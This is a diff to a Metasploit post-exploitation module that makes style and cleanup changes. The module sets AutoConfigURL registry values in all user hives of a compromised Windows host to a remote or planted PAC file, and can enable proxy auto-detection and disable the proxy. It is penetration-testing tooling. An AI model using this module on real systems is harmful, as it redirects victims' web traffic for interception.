@@ -32,6 +32,11 @@ class MetasploitModule < Msf::Post
               stdapi_sys_config_getenv
             ]
           }
+        },
+        'Notes' => {
+          'Stability' => [SERVICE_RESOURCE_LOSS],
+          'SideEffects' => [CONFIG_CHANGES],
+          'Reliability' => []
         }
       )
     )
@@ -47,83 +52,75 @@ class MetasploitModule < Msf::Post
   end
 
   def run
-    if datastore['LOCAL_PAC'].blank? and datastore['REMOTE_PAC'].blank?
-      print_error("You must set a remote or local PAC file. Aborting...")
-      return
+    if datastore['LOCAL_PAC'].blank? && datastore['REMOTE_PAC'].blank?
+      fail_with(Failure::BadConfig, 'You must set a remote or local PAC file. Aborting...')
     end
 
     if datastore['REMOTE_PAC']
       @remote = true
-      print_status("Setting automatic configuration script from a remote PAC file ...")
+      print_status('Setting automatic configuration script from a remote PAC file ...')
       res = enable_proxypac(datastore['REMOTE_PAC'])
-      unless res
-        print_error("Error while setting an automatic configuration script. Aborting...")
-        return
-      end
     else
       @remote = false
-      print_status("Setting automatic configuration script from local PAC file ...")
+      print_status('Setting automatic configuration script from local PAC file ...')
       pac_file = create_pac(datastore['LOCAL_PAC'])
       unless pac_file
-        print_error("There were problems creating the PAC proxy file. Aborting...")
+        print_error('There were problems creating the PAC proxy file. Aborting...')
         return
       end
       res = enable_proxypac(pac_file)
-      unless res
-        print_error("Error while setting an automatic configuration script. Aborting...")
-        return
-      end
+    end
+    unless res
+      print_error('Error while setting an automatic configuration script. Aborting...')
+      return
     end
 
-    print_good("Automatic configuration script configured...")
+    print_good('Automatic configuration script configured...')
 
     if datastore['AUTO_DETECT']
-      print_status("Enabling Automatically Detect Settings...")
+      print_status('Enabling Automatically Detect Settings...')
       unless auto_detect_on
-        print_error("Failed to enable Automatically Detect Settings. Proceeding anyway...")
+        print_error('Failed to enable Automatically Detect Settings. Proceeding anyway...')
       end
     end
 
     if datastore['DISABLE_PROXY']
-      print_status("Disabling the Proxy Server...")
+      print_status('Disabling the Proxy Server...')
       unless disable_proxy
-        print_error("Failed to disable Proxy Server. Proceeding anyway...")
+        print_error('Failed to disable Proxy Server. Proceeding anyway...')
       end
     end
   end
 
   def create_pac(local_pac)
-    pac_file = session.sys.config.getenv("APPDATA") << "\\" << Rex::Text.rand_text_alpha((rand(8) + 6)) << ".pac"
-    conf_pac = ""
+    pac_file = session.sys.config.getenv('APPDATA') << '\\' << "#{Rex::Text.rand_text_alpha(6..13)}.pac"
 
-    if ::File.exist?(local_pac)
-      conf_pac << ::File.open(local_pac, "rb").read
-    else
-      print_error("Local PAC file not found.")
+    unless ::File.exist?(local_pac)
+      print_error('Local PAC file not found.')
       return false
     end
 
-    if write_file(pac_file, conf_pac)
-      print_status("PAC proxy configuration file written to #{pac_file}")
-      return pac_file
-    else
-      return false
-    end
+    conf_pac = ::File.open(local_pac, 'rb').read
+
+    return false unless write_file(pac_file, conf_pac)
+
+    print_status("PAC proxy configuration file written to #{pac_file}")
+    return pac_file
   end
 
   def enable_proxypac(pac)
     proxy_pac_enabled = false
 
     registry_enumkeys('HKU').each do |k|
-      next unless k.include? "S-1-5-21"
-      next if k.include? "_Classes"
+      next unless k.include?('S-1-5-21')
+      next if k.include?('_Classes')
 
       key = "HKEY_USERS\\#{k}\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet\ Settings"
-      value_auto = "AutoConfigURL"
-      file = (@remote) ? "#{pac}" : "file://#{pac}"
+      value_auto = 'AutoConfigURL'
+      file = @remote ? pac.to_s : "file://#{pac}"
 
       begin
-        res = registry_setvaldata(key, value_auto, file, "REG_SZ")
+        res = registry_setvaldata(key, value_auto, file, 'REG_SZ')
       rescue ::RuntimeError, Rex::TimeoutError
         next
       end
@@ -137,45 +134,37 @@ class MetasploitModule < Msf::Post
       end
     end
 
-    if proxy_pac_enabled
-      return true
-    else
-      return false
-    end
+    proxy_pac_enabled
   end
 
   def auto_detect_on
     auto_detect_enabled = false
 
     registry_enumkeys('HKU').each do |k|
-      next unless k.include? "S-1-5-21"
-      next if k.include? "_Classes"
+      next unless k.include? 'S-1-5-21'
+      next if k.include? '_Classes'
 
       key = "HKEY_USERS\\#{k}\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet\ Settings\\Connections"
       if change_connection(16, '0D', key)
-        print_good("Automatically Detect Settings on.")
+        print_good('Automatically Detect Settings on.')
         auto_detect_enabled = true
       end
     end
 
-    if auto_detect_enabled
-      return true
-    else
-      return false
-    end
+    auto_detect_enabled
   end
 
   def disable_proxy
-    value_enable = "ProxyEnable"
+    value_enable = 'ProxyEnable'
     profile = false
 
     registry_enumkeys('HKU').each do |k|
-      next unless k.include? "S-1-5-21"
-      next if k.include? "_Classes"
+      next unless k.include?('S-1-5-21')
+      next if k.include?('_Classes')
 
       key = "HKEY_USERS\\#{k}\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet\ Settings"
       begin
-        registry_setvaldata(key, value_enable, 0, "REG_DWORD")
+        registry_setvaldata(key, value_enable, 0, 'REG_DWORD')
         profile = true
       rescue ::RuntimeError, Rex::TimeoutError
         next
@@ -183,20 +172,20 @@ class MetasploitModule < Msf::Post
     end
 
     if profile
-      print_good("Proxy disabled.")
+      print_good('Proxy disabled.')
       return true
-    else
-      return false
     end
+
+    return false
   end
 
   def change_connection(offset, value, key)
-    value_default = "DefaultConnectionSettings"
+    value_default = 'DefaultConnectionSettings'
     begin
       value_con = registry_getvaldata(key, value_default)
       binary_data = value_con.unpack('H*')[0]
       binary_data[offset, 2] = value
-      registry_setvaldata(key, value_default, ["%x" % binary_data.to_i(16)].pack("H*"), "REG_BINARY")
+      registry_setvaldata(key, value_default, ['%x' % binary_data.to_i(16)].pack('H*'), 'REG_BINARY')
     rescue ::RuntimeError, Rex::TimeoutError
       return false
     end
